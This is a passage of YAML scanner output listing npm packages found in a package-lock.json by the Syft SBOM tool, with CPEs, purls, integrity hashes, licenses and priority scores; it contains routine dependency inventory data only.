- cpe: cpe:2.3:a:color-convert:color_convert:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color_convert:color-convert:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color_convert:color_convert:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color:color-convert:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color:color_convert:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/color-convert@2.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz
|
|
integrity: sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==
|
|
dependencies:
|
|
color-name: ~1.1.4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 568b6e4207edec50
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: color-name 1.1.4'
|
|
title: color-name 1.1.4
|
|
description: 'Package discovered: color-name 1.1.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9d8d6c4ccfd91cbf
|
|
name: color-name
|
|
version: 1.1.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:color-name:color-name:1.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color-name:color_name:1.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color_name:color-name:1.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color_name:color_name:1.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color:color-name:1.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color:color_name:1.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/color-name@1.1.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz
|
|
integrity: sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c5d023023358f691
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: color-name 2.1.0'
|
|
title: color-name 2.1.0
|
|
description: 'Package discovered: color-name 2.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8dfa4f08fc1899a7
|
|
name: color-name
|
|
version: 2.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:color-name:color-name:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color-name:color_name:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color_name:color-name:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color_name:color_name:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color:color-name:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:color:color_name:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/color-name@2.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/color-name/-/color-name-2.1.0.tgz
|
|
integrity: sha512-1bPaDNFm0axzE4MEAzKPuqKWeRaT43U/hyxKPBdqTfmPF+d6n7FSoTFxLVULUJOmiLp01KjhIPPH+HrXZJN4Rg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d0d3f9cc2cfd641a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: color-string 1.9.1'
|
|
title: color-string 1.9.1
|
|
description: 'Package discovered: color-string 1.9.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b96884f4eed4192d
|
|
name: color-string
|
|
version: 1.9.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:color-string_project:color-string:1.9.1:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/color-string@1.9.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/color-string/-/color-string-1.9.1.tgz
|
|
integrity: sha512-shrVawQFojnZv6xM40anx4CkoDP+fZsw/ZerEMsW/pyzsRbElpsL/DBVW7q3ExxwusdNXI3lXpuhEZkzs8p5Eg==
|
|
dependencies:
|
|
color-name: ^1.0.0
|
|
simple-swizzle: ^0.2.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b8edaba313b178d2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: color-string 2.1.4'
|
|
title: color-string 2.1.4
|
|
description: 'Package discovered: color-string 2.1.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1f15e4f4433605fc
|
|
name: color-string
|
|
version: 2.1.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:color-string_project:color-string:2.1.4:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/color-string@2.1.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/color-string/-/color-string-2.1.4.tgz
|
|
integrity: sha512-Bb6Cq8oq0IjDOe8wJmi4JeNn763Xs9cfrBcaylK1tPypWzyoy2G3l90v9k64kjphl/ZJjPIShFztenRomi8WTg==
|
|
dependencies:
|
|
color-name: ^2.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 227fe4ddfe5bcfb2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: combined-stream 1.0.8'
|
|
title: combined-stream 1.0.8
|
|
description: 'Package discovered: combined-stream 1.0.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6feb2abce081a13b
|
|
name: combined-stream
|
|
version: 1.0.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:combined-stream:combined-stream:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:combined-stream:combined_stream:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:combined_stream:combined-stream:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:combined_stream:combined_stream:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:combined:combined-stream:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:combined:combined_stream:1.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/combined-stream@1.0.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz
|
|
integrity: sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==
|
|
dependencies:
|
|
delayed-stream: ~1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: df1825804c4b40ea
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: commander 10.0.1'
|
|
title: commander 10.0.1
|
|
description: 'Package discovered: commander 10.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 68cb0d0425b8ec71
|
|
name: commander
|
|
version: 10.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:commander:commander:10.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/commander@10.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/commander/-/commander-10.0.1.tgz
|
|
integrity: sha512-y4Mg2tXshplEbSGzx7amzPwKKOCGuoSRP/CjEdwwk0FOGlUbq6lKuoyDZTNZkmxHdJtp54hdfY/JUrdL7Xfdug==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b275a043135b9b63
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: commander 4.1.1'
|
|
title: commander 4.1.1
|
|
description: 'Package discovered: commander 4.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6ef23c8bf6c64c11
|
|
name: commander
|
|
version: 4.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:commander:commander:4.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/commander@4.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/commander/-/commander-4.1.1.tgz
|
|
integrity: sha512-NOKm8xhkzAjzFx8B2v5OAHT+u5pRQc2UCa2Vq9jYL/31o2wi9mxBA7LIFs3sV5VSC49z6pEhfbMULvShKj26WA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: af21f9856150d16c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: concat-stream 1.6.2'
|
|
title: concat-stream 1.6.2
|
|
description: 'Package discovered: concat-stream 1.6.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ee26fc9f2aa2694f
|
|
name: concat-stream
|
|
version: 1.6.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:concat-stream:concat-stream:1.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:concat-stream:concat_stream:1.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:concat_stream:concat-stream:1.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:concat_stream:concat_stream:1.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:concat:concat-stream:1.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:concat:concat_stream:1.6.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/concat-stream@1.6.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz
|
|
integrity: sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw==
|
|
dependencies:
|
|
buffer-from: ^1.0.0
|
|
inherits: ^2.0.3
|
|
readable-stream: ^2.2.2
|
|
typedarray: ^0.0.6
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6a853859517f2ba3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: config-chain 1.1.13'
|
|
title: config-chain 1.1.13
|
|
description: 'Package discovered: config-chain 1.1.13'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f8adcbfce494f378
|
|
name: config-chain
|
|
version: 1.1.13
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:config-chain:config-chain:1.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:config-chain:config_chain:1.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:config_chain:config-chain:1.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:config_chain:config_chain:1.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:config:config-chain:1.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:config:config_chain:1.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/config-chain@1.1.13
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/config-chain/-/config-chain-1.1.13.tgz
|
|
integrity: sha512-qj+f8APARXHrM0hraqXYb2/bOVSV4PvJQlNZ/DVj0QrmNM2q2euizkeuVckQ57J+W0mRH6Hvi+k50M4Jul2VRQ==
|
|
dependencies:
|
|
ini: ^1.3.4
|
|
proto-list: ~1.2.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: aa020ae4ab2eadc3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: content-disposition 0.5.4'
|
|
title: content-disposition 0.5.4
|
|
description: 'Package discovered: content-disposition 0.5.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5a8a76bf321e2afc
|
|
name: content-disposition
|
|
version: 0.5.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:content-disposition:content-disposition:0.5.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:content-disposition:content_disposition:0.5.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:content_disposition:content-disposition:0.5.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:content_disposition:content_disposition:0.5.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:content:content-disposition:0.5.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:content:content_disposition:0.5.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/content-disposition@0.5.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz
|
|
integrity: sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ==
|
|
dependencies:
|
|
safe-buffer: 5.2.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9a45820ffdb99ef9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: content-type 1.0.5'
|
|
title: content-type 1.0.5
|
|
description: 'Package discovered: content-type 1.0.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e6774efb67a1cd80
|
|
name: content-type
|
|
version: 1.0.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:content-type:content-type:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:content-type:content_type:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:content_type:content-type:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:content_type:content_type:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:content:content-type:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:content:content_type:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/content-type@1.0.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz
|
|
integrity: sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 475f89190adc46cd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: cookie 0.7.2'
|
|
title: cookie 0.7.2
|
|
description: 'Package discovered: cookie 0.7.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: dabea341270367ac
|
|
name: cookie
|
|
version: 0.7.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
